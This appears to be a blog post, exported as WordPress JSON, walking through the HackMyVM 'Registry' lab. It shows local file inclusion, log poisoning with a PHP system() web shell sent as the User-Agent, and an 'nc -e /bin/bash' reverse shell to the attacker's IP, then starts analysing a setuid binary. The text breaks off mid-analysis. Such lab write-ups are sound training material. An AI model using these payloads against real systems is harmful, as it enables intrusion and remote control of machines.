{"id":714,"date":"2024-07-06T01:59:16","date_gmt":"2024-07-05T17:59:16","guid":{"rendered":"http:\/\/162.14.82.114\/?p=714"},"modified":"2024-07-06T01:59:16","modified_gmt":"2024-07-05T17:59:16","slug":"hmv-_-registry","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/714\/07\/06\/2024\/","title":{"rendered":"hmv[-_-]Registry"},"content":{"rendered":"<h1>Registry<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158487.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158487.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422150827506\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158488.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158488.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422151517386\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.153 -- -A\n\nOpen 192.168.0.153:22\nOpen 192.168.0.153:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 4d:0e:bf:5f:7c:42:4a:85:95:14:07:6c:07:f8:65:0c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBApCuuNgbJntGQooQzipYmfZbXHW6jqv\/Ra61OaXxCEYBvFXm20nA1rkGHF6OO5ccrcQjNpW1Ip5RpyJBULRMTc=\n|   256 61:cb:06:4a:a5:bf:a2:af:64:0c:9e:d4:20:b0:50:6f (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAU\/i0OezXfBiMIqCmG2G9bmTDjD1t+c0TQuXCTOdJQ0\n80\/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))\n|_http-title: Coming Soon 10\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.153\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.153\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 278]\n\/index.php            (Status: 200) [Size: 5938]\n\/.php                 (Status: 403) [Size: 278]\n\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.153\/images\/]\n\/default.php          (Status: 200) [Size: 5938]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/192.168.0.153\/css\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/192.168.0.153\/js\/]\n\/javascript           (Status: 301) [Size: 319] [--&gt; http:\/\/192.168.0.153\/javascript\/]\n\/vendor               (Status: 301) [Size: 315] [--&gt; http:\/\/192.168.0.153\/vendor\/]\n\/fonts                (Status: 301) [Size: 314] [--&gt; http:\/\/192.168.0.153\/fonts\/]\n\/.html                (Status: 403) [Size: 278]\n\/.php                 (Status: 403) [Size: 278]\n\/server-status        (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158489.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158489.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422151745683\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5230\u5904\u70b9\u70b9\uff0c\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=default.php<\/code><\/pre>\n<h3>LFI<\/h3>\n<p>\u6000\u7591\u5b58\u5728LFI\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<pre><code>http:\/\/192.168.0.153\/index.php?page=..\/..\/..\/..\/..\/..\/etc\/passwd\nhttp:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/etc\/passwd<\/code><\/pre>\n<pre><code class=\"language-bash\">root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/bash\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\ngato:x:1000:1000:gato:\/home\/gato:\/bin\/bash\nuuidd:x:108:112::\/run\/uuidd:\/usr\/sbin\/nologin\nuser:x:1001:1001::\/home\/user:\/bin\/bash\ncxdxnt:x:1002:1002::\/home\/cxdxnt:\/bin\/bash<\/code><\/pre>\n<p>\u53d1\u73b0\u786e\u5b9e\u662f\u5b58\u5728\u7684\uff0c\u5c1d\u8bd5\u4f7f\u7528\u4f2a\u534f\u8bae\u8bfb\u53d6\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n<p>\u7ee7\u7eed\u5c1d\u8bd5\u5176\u4ed6\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/etc\/apache2\/apache2.conf<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8bfb\u53d6\u65e5\u5fd7\uff1a<\/p>\n<pre><code>\/var\/log\/apache2\/access.log<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158491.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158491.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422154426345\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u554a\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/LFIscanner]\n\u2514\u2500$ curl http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/access.log<\/code><\/pre>\n<p>\u4e5f\u6ca1\u4e1c\u897f\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/error.log<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158492.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158492.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422155935885\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u62a5\u9519\u7684\u65e5\u5fd7\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">[Mon Apr 22 07:54:23.040815 2024] [php:error] [pid 733] [client 192.168.0.143:59904] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 161235177 bytes) in \/var\/www\/html\/index.php on line 4 [Mon Apr 22 07:59:00.445228 2024] [php:warn] [pid 716] [client 192.168.0.152:3142] PHP Warning: include(\/var\/www\/html\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache\/access.log): Failed to open stream: No such file or directory in \/var\/www\/html\/index.php on line 4 [Mon Apr 22 07:59:00.445251 2024] [php:warn] [pid 716] [client 192.168.0.152:3142] PHP Warning: include(): Failed opening &#039;\/var\/www\/html\/..\/..\/..\/..\/..\/..\/..\/var\/log\/apache\/access.log&#039; for inclusion (include_path=&#039;.:\/usr\/share\/php&#039;) in \/var\/www\/html\/index.php on line 4<\/code><\/pre>\n<p>\u989d\uff0c\u5c1d\u8bd5\u91cd\u65b0\u5bfc\u5165\u9776\u673a\uff0c\u521a\u521a\u8dd1\u4e86\u4e00\u4e2aLFI\u7684\u811a\u672c\uff0c\u53ef\u80fd\u5bfc\u81f4\u592a\u591a\u4e86\uff01<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/access.log<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158493.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158493.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422161643136\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u626b\u5230\u4e86\uff01<\/p>\n<h3>\u65e5\u5fd7\u6ce8\u5165<\/h3>\n<p>\u5c1d\u8bd5\u65e5\u5fd7\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">curl &quot;http:\/\/192.168.0.153\/&quot; -A &quot;&lt;?php system(\\$_GET[&#039;hack&#039;]); ?&gt;&quot;  <\/code><\/pre>\n<blockquote>\n<ul>\n<li><code>-A (or --user-agent)<\/code>: \u8bbe\u7f6e <strong>User-Agent<\/strong> \u5b57\u6bb5.<\/li>\n<li><code>-b (or --cookie)<\/code>: \u8bbe\u7f6e <strong>Cookie<\/strong> \u5b57\u6bb5.<\/li>\n<li><code>-e (or --referer)<\/code>: \u8bbe\u7f6e <strong>Referer<\/strong> \u5b57\u6bb5.<\/li>\n<\/ul>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158494.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158494.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422162319069\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6210\u529f\uff01<\/p>\n<p>\u53cd\u5f39shell\u56de\u6765\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.153\/index.php?page=....\/\/....\/\/....\/\/....\/\/....\/\/var\/log\/apache2\/access.log&amp;hack=nc -e \/bin\/bash 192.168.0.143 1234<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158495.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158495.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422162447403\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@registry:\/$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/bash\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:101:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:102:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:104::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:104:105:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\npollinate:x:105:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nusbmux:x:107:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\ngato:x:1000:1000:gato:\/home\/gato:\/bin\/bash\nuuidd:x:108:112::\/run\/uuidd:\/usr\/sbin\/nologin\nuser:x:1001:1001::\/home\/user:\/bin\/bash\ncxdxnt:x:1002:1002::\/home\/cxdxnt:\/bin\/bash\n(remote) www-data@registry:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@registry:\/$ cd \/home\n(remote) www-data@registry:\/home$ ls -la\ntotal 20\ndrwxr-xr-x  5 root   root   4096 Jul 24  2023 .\ndrwxr-xr-x 19 root   root   4096 Jul 24  2023 ..\ndrwxr-x---  3 cxdxnt cxdxnt 4096 Jul 24  2023 cxdxnt\ndrwxr-x---  8 gato   gato   4096 Jul 24  2023 gato\ndrwxr-x---  5 user   user   4096 Jul 24  2023 user\n(remote) www-data@registry:\/home$ cd user\/\nbash: cd: user\/: Permission denied\n(remote) www-data@registry:\/home$ cd cxdxnt\/\nbash: cd: cxdxnt\/: Permission denied\n(remote) www-data@registry:\/home$ cd gato\/\nbash: cd: gato\/: Permission denied\n(remote) www-data@registry:\/home$ find \/ -perm -u=s -type 2&gt;\/dev\/null\n(remote) www-data@registry:\/home$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/bin\/gpasswd\n\/usr\/bin\/fusermount3\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/libexec\/polkit-agent-helper-1\n\/opt\/others\/program\n(remote) www-data@registry:\/home$ file \/opt\/others\/program\n\/opt\/others\/program: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=7d65aff0f94edaa475537d22ff820c314b4a33cb, for GNU\/Linux 3.2.0, not stripped\n(remote) www-data@registry:\/home$ \/opt\/others\/program\nUsage: \/opt\/others\/program &lt;name&gt;\n(remote) www-data@registry:\/home$ \/opt\/others\/program user\n(remote) www-data@registry:\/home$<\/code><\/pre>\n<h3>\u63d0\u6743cxdxnt<\/h3>\n<h4>\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h4>\n<pre><code class=\"language-bash\">(remote) www-data@registry:\/home$ cd \/opt\/others        \n(remote) www-data@registry:\/opt\/others$ ls -la\ntotal 24\ndrwxr-xr-x 2 cxdxnt cxdxnt  4096 Jul 24  2023 .\ndr-xr-xr-x 5 gato   gato    4096 Jul 24  2023 ..\n-rwsr-xr-x 1 cxdxnt cxdxnt 15976 Jul 24  2023 program\n(remote) www-data@registry:\/opt\/others$   \n(local) pwncat$ download program\nprogram \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 16.0\/16.0 KB \u2022 ? \u2022 0:00:00[04:24:34] downloaded 15.98KiB in 0.17 seconds                                                                                            download.py:71\n(local) pwncat$<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ pwn checksec program  \n[*] &#039;\/home\/kali\/temp\/Registry\/program&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX unknown - GNU_STACK missing\n    PIE:      No PIE (0x400000)\n    Stack:    Executable\n    RWX:      Has RWX segments\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ strings program            \n\/lib64\/ld-linux-x86-64.so.2\nuS}&quot;\n1KJ3\n__libc_start_main\nstrcpy\nprintf\nlibc.so.6\nGLIBC_2.2.5\nGLIBC_2.34\n__gmon_start__\nPTE1\nH=8@@\nUsage: %s &lt;name&gt;\n:*3$&quot;\nGCC: (Ubuntu 11.3.0-1ubuntu1~22.04.1) 11.3.0\ncrt1.o\n__abi_tag\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.0\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nprogram.c\n__FRAME_END__\n_DYNAMIC\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_start_main@GLIBC_2.34\nstrcpy@GLIBC_2.2.5\nvuln\n_edata\n_fini\nprintf@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n_end\n_dl_relocate_static_pie\n__bss_start\nmain\n__TMC_END__\n_init\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.gnu.property\n.note.gnu.build-id\n.note.ABI-tag\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.sec\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n<h4>\u53cd\u7f16\u8bd1<\/h4>\n<p>\u4f7f\u7528<code>ida64<\/code>\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  __int64 v3; \/\/ rbp\n  int result; \/\/ eax\n  __int64 v5; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v5 = v3;\n  if ( argc &gt; 1 )\n    result = vuln(argv[1], argv, envp);\n  else\n    result = sub_401060(&quot;Usage: %s &lt;name&gt;\\n&quot;, *argv, envp);\n  return result;\n}<\/code><\/pre>\n<pre><code class=\"language-c\">__int64 __usercall vuln@&lt;rax&gt;(__int64 a1@&lt;rbp&gt;, __int64 a2@&lt;rdi&gt;)\n{\n  __int64 v3; \/\/ [rsp-88h] [rbp-88h]\n  __int64 v4; \/\/ [rsp-8h] [rbp-8h]\n\n  __asm { endbr64 }\n  v4 = a1;\n  return sub_401050(&amp;v3, a2);\n}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158496.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158496.png\" 